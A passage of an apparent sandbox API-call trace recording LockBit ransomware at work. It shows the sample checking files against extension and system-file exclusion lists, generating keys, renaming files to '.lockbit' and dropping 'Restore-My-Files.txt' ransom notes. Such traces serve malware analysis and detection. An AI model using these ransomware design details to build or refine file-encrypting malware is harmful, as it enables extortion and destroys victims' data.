(lpString1=".dbv", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.288] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.288] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01160_.WMF.lockbit") returned 72 [0167.288] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01160_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.289] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.290] malloc (_Size=0x40068) returned 0x3df0008 [0167.290] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2436) returned 1 [0167.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.291] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.291] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.309] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01160_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01160_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.310] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.310] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.311] free (_Block=0x1fa2ed8) [0167.311] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01160_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.311] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.311] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.311] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5efa1c00, ftCreationTime.dwHighDateTime=0x1bf1118, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5efa1c00, ftLastWriteTime.dwHighDateTime=0x1bf1118, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE01172_.WMF", cAlternateFileName="")) returned 1 [0167.312] lstrcmpiW (lpString1=".", lpString2="PE01172_.WMF") returned -1 [0167.312] lstrcmpiW (lpString1="..", lpString2="PE01172_.WMF") returned -1 [0167.312] PathFindExtensionW (pszPath="PE01172_.WMF") returned=".WMF" [0167.312] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.312] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.313] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.313] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE01172_.WMF") returned 1 [0167.314] lstrcmpiW (lpString1="ntldr", lpString2="PE01172_.WMF") returned -1 [0167.314] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE01172_.WMF") returned -1 [0167.314] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE01172_.WMF") returned -1 [0167.314] lstrcmpiW (lpString1="autorun.inf", lpString2="PE01172_.WMF") returned -1 [0167.314] lstrcmpiW (lpString1="thumbs.db", lpString2="PE01172_.WMF") returned 1 [0167.314] lstrcmpiW (lpString1="iconcache.db", lpString2="PE01172_.WMF") returned -1 [0167.314] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.314] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01172_.WMF") returned=".WMF" [0167.314] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.314] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.314] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.315] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.315] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01172_.WMF.lockbit") returned 72 [0167.315] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01172_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0167.316] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.316] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.317] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1436) returned 1 [0167.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.317] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.318] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.322] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01172_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01172_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.322] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.322] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.323] free (_Block=0x1fa2ed8) [0167.323] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01172_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.323] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.324] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb58e6600, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb58e6600, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x3f9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE01191_.WMF", cAlternateFileName="")) returned 1 [0167.324] lstrcmpiW (lpString1=".", lpString2="PE01191_.WMF") returned -1 [0167.324] lstrcmpiW (lpString1="..", lpString2="PE01191_.WMF") returned -1 [0167.324] PathFindExtensionW (pszPath="PE01191_.WMF") returned=".WMF" [0167.324] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.324] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.325] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.325] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.326] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE01191_.WMF") returned 1 [0167.326] lstrcmpiW (lpString1="ntldr", lpString2="PE01191_.WMF") returned -1 [0167.326] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE01191_.WMF") returned -1 [0167.326] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE01191_.WMF") returned -1 [0167.326] lstrcmpiW (lpString1="autorun.inf", lpString2="PE01191_.WMF") returned -1 [0167.326] lstrcmpiW (lpString1="thumbs.db", lpString2="PE01191_.WMF") returned 1 [0167.326] lstrcmpiW (lpString1="iconcache.db", lpString2="PE01191_.WMF") returned -1 [0167.326] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.326] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01191_.WMF") returned=".WMF" [0167.326] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.327] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.327] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.328] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.328] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.328] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.328] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.328] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.328] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.328] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.328] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01191_.WMF.lockbit") returned 72 [0167.328] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01191_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0167.343] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.343] malloc (_Size=0x40068) returned 0x3d70450 [0167.343] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=16284) returned 1 [0167.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0167.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0167.345] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0167.350] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01191_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01191_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.350] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.350] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.352] free (_Block=0x1fa2ed8) [0167.352] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01191_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.352] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.352] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.352] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5e9600, ftCreationTime.dwHighDateTime=0x1bd4b0c, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xea5e9600, ftLastWriteTime.dwHighDateTime=0x1bd4b0c, nFileSizeHigh=0x0, nFileSizeLow=0x1418, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE01661_.WMF", cAlternateFileName="")) returned 1 [0167.352] lstrcmpiW (lpString1=".", lpString2="PE01661_.WMF") returned -1 [0167.352] lstrcmpiW (lpString1="..", lpString2="PE01661_.WMF") returned -1 [0167.352] PathFindExtensionW (pszPath="PE01661_.WMF") returned=".WMF" [0167.352] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.352] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.352] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.352] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.352] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.352] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".hta", 